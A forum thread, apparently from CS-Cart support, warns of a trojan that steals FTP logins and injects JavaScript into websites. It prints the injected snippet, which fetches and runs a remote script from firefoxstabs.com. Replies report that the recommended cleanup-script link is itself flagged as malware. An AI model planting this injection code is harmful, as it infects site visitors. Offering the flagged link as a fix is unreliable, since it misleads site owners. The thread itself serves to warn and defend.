Be careful: Malicious code in JavaScript files

Hello all,



It seems that some dangerous trojan has increased its activity on the Internet recently - it gets access to the user’s local computer, grabs FTP logins and passwords (usually stored in Total Commander) and then adds a malicious code to all index and JavaScript files on websites.



The malicious code looks like this:

<br />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script><br />

```<br />
(it is usually is added to the end of JavaScript files).<br />
<br />
If you have noticed some suspicious behavior of your website or some unknown code in the source code of your pages, please do the following:<br />
<br />
- Install a good anti-virus system (if you do not have any) and check your computer, delete all viruses and trojan programs (it is said that the mentioned code can be added via Blackhole Exploit Kit).<br />
- Change all access information to your sites (FTP, Cpanel, administration panel access).<br />
- Add "firefoxstabs.com" to firewall restrictions on your server.<br />
- Use a clean-up script (for example, this one - [url]http://possible.in/products-security-updates.php[/url]) to remove the malicious JavaScript from infected files.<br />
<br />
I hope this information will help you.<br />
<br />
Thank you.<br />
<br />
---<br />
Kate Lazarevskaya<br />
CS-Cart Support team

Is there a way to scan website ?



I know there is many companies who offering paid security scan seal, but any free service ?

[quote name=‘CS-Cart Support team’]

If you have noticed some suspicious behavior of your website or some unknown code in the source code of your pages, please do the following:[/QUOTE]



You can check your website too with:



[url]http://www.virustotal.com/[/url]



Attention, there are 2 checks in a row, so, please, open Popup window for an extra check of your website at the end of the first run.

[quote name=‘CS-Cart Support team’]

• Add “[COLOR=“Red”]firefoxstabs.com[/COLOR]” to firewall restrictions on your server.[/QUOTE]
  
  
  
  This website seem to be off line today:
  
  
  

[QUOTE]This account has been suspended.[/QUOTE]

[quote name=‘CS-Cart Support team’]

• Use a clean-up script (for example, this one - [url]http://possible.in/products-security-updates.php[/url]) to remove the malicious JavaScript from infected files.[/QUOTE]
  
  
  
  Please, check this URL:
  
  
  
  [url]http://possible.in/products-security-updates.php[/url]
  
  
  
  With TotalVirus.com:
  
  
  
  [url]http://www.virustotal.com/[/url]
  
  
  
  This URL is reported Security Issues by these antivirus softwares:
  
  
  
  Avast
  
  AVG
  
  Emsisoft
  
  GData
  
  Ikarus
  
  Norton
  
  
  
  This website is reported as malware site by:
  
  
  
  Websense ThreatSeeker
  
  
  
  
  
  
  
  Lee Li Pop

Always informative, thank you and thank you Lee for the link.